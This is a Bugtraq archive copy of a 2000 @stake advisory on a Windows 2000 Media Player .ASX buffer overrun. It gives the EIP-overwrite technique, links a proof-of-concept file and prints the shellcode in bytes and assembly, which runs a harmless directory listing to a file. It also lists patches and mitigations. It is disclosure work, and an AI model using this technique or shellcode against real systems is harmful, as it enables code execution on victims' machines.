Bugtraq mailing list archives
@stake Advisory: Windows 2000 .ASX Buffer Overrun (A112300-1)
From: "@stake Advisories" <advisories () ATSTAKE COM>
Date: Thu, 23 Nov 2000 10:46:11 -0500
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
@stake Inc.
www.atstake.com
Security Advisory
Advisory Name: Windows 2000 .ASX Buffer Overrun
Release Date: 11/23/2000
Application: Microsoft Windows Explorer with
Microsoft Media Player v6.xx and
Microsoft Media Player v7.xx.
Platform: Windows 2000 SP1
Severity: There is a buffer overflow condition that
can result in execution of arbitrary code.
Authors: Ollie Whitehouse [ollie () atstake com]
Vendor Status: vendor has released patch
Web: www.atstake.com/research/advisories/2000/a112300-1.txt
Overview:
Microsoft Windows Media Player (http://www.microsoft.com/) plays
streaming media files which have the extension .ASX. There is a buffer
overrun caused by the way that WMP deals with the .ASX file format when
using the Web View option in Windows Explorer (enabled by default). This
problem can allow the execution of arbitrary computer code.
One method of exploitation requires the user to save the .ASX file down to
the local machine and navigate to it via Explorer. Single clicking once on
the file will cause Explorer to Auto-Preview the destination streaming
media file which is specified in the .ASX file. Passing an overly long
destination to this media file will cause the buffer overrun to occur and
the abtirary code to execute.
This is another good example of why attachments from unknown sources
should not be trusted. Also why systems/network administrators should
evaluate the types of attachments which are allowed to be passed to users
desktops even though they may not contain any executable code.
There are other methods of exploitation which could allow .ASX files to be
opened automatically when a user visits a malicious web site. This can be
prevented by configuring Internet Explorer not to run ActiveX controls.
Proof of Concept:
The following file once uncompressed contains
'Explorer-Win2k-BufferOverrun.asx'. Once this file is previewed within
Explorer with a single click, it will cause Microsoft Explorer to create a
file in the root of C: called !test!. This file will contain a directory
listing of the current working directory when the proof of concept is
executed. Once this proof of concept is executed it will require
Explorer.exe to be restarted.
This example has been hardcoded to work with Windows 2000 (SP1) and
MSVCRT.DLL v6.1.8637. Another reason why this example is service-pack
specific is that the code is randomly located on the stack (so EIP can not
be pointed directly to the location of the arbitray code), EBX is located
4 bytes before EIP. The example overwrites EIP with the address of JMP EBX
(FF E2, this instruction is contained in kernel32 and thus static). This
in turn then tries to execute the value at EBX (which containes NOPs),
then EIP (luckly this does not contain any code which alters or stops
program flow) and then finally executes the arbitry code placed on the
stack. The assembly code which is executed by this example at this point
is contained at the end of this advisory. Within the ASX file the example
code is contained at offset 00005ce4h.
Proof of concept ASX File:
An ASX file which contains the problem is contained in this .zip file:
http://www.atstake.com/research/advisories/2000/asx-bufferoverrun.zip
<-----<Assembly code for proof of concept>-----
[Byte Code] [Assembly]
90 nop
8B DC mov ebx,esp
8B E3 mov esp,ebx
53 push ebx
8B DC mov ebx,esp
33 FF xor edi,edi
57 push edi
57 push edi
57 push edi
57 push edi
57 push edi
57 push edi
57 push edi
C6 43 E9 63 mov byte ptr [ebx-17h],63h
C6 43 EA 6D mov byte ptr [ebx-16h],6Dh
C6 43 EB 64 mov byte ptr [ebx-15h],64h
C6 43 EC 2E mov byte ptr [ebx-14h],2Eh
C6 43 ED 65 mov byte ptr [ebx-13h],65h
C6 43 EE 78 mov byte ptr [ebx-12h],78h
C6 43 EF 65 mov byte ptr [ebx-11h],65h
C6 43 F0 2F mov byte ptr [ebx-10h],2Fh
C6 43 F1 63 mov byte ptr [ebx-0Fh],63h
C6 43 F2 64 mov byte ptr [ebx-0Eh],64h
C6 43 F3 69 mov byte ptr [ebx-0Dh],69h
C6 43 F4 72 mov byte ptr [ebx-0Ch],72h
C6 43 F5 3E mov byte ptr [ebx-0Bh],3Eh
C6 43 F6 63 mov byte ptr [ebx-0Ah],63h
C6 43 F7 3A mov byte ptr [ebx-9],3Ah
C6 43 F8 5C mov byte ptr [ebx-8],5Ch
C6 43 F9 21 mov byte ptr [ebx-7],21h
C6 43 FA 74 mov byte ptr [ebx-6],74h
C6 43 FB 65 mov byte ptr [ebx-5],65h
C6 43 FC 73 mov byte ptr [ebx-4],73h
C6 43 FD 74 mov byte ptr [ebx-3],74h
C6 43 FE 21 mov byte ptr [ebx-2],21h
B8 AD AA 01 78 mov eax,7801AAADh
50 push eax
8D 43 E9 lea eax,[ebx-17h]
50 push eax
FF 53 E4 call dword ptr [ebx-1Ch]
56 push esi
BB 2D F3 E8 77 mov ebx,77E8F32Dh
FF D3 call ebx
C3 ret
<-----<End of code for proof of concept>-----
Vendor Response:
Microsoft has released a security bulletin describing the issue:
http://www.microsoft.com/technet/security/bulletin/MS00-090.asp
Microsoft has release patches for Windows Media Player:
Windows Media Player 6.4:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=26069
Windows Media Player 7:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=26067
Recommendation:
The best solution is to install the vendor patch for your version of the
media player. This solves this specific problem.
In general, unless you need to run ActiveX controls, it is a good idea to
configure Internet Explorer not to run them. At the very least you can
configure IE to not run ActiveX controls in the Internet Security Zone.
It doesn't matter whether the controls are signed or not. As you can see
from this advisory even signed controls can have security problems.
Of course, never trust attachments from unknown sources, even data files
such as the .ASX files discussed in this advisory.
For more advisories: http://www.atstake.com/research/advisories/
PGP Key: http://www.atstake.com/research/pgp_key.asc
Copyright 2000 @stake, Inc. All rights reserved.
-----BEGIN PGP SIGNATURE-----
Version: PGP 7.0
iQA/AwUBOh07oVESXwDtLdMhEQJTMwCeKP4OnGqIS9GcKHSCBOaAyFdahJoAn37+
L5L7UwBkJOH5n0TQ0i2Qr3uY
=DkFu
-----END PGP SIGNATURE-----
Current thread:
- @stake Advisory: Windows 2000 .ASX Buffer Overrun (A112300-1) @stake Advisories (Nov 24)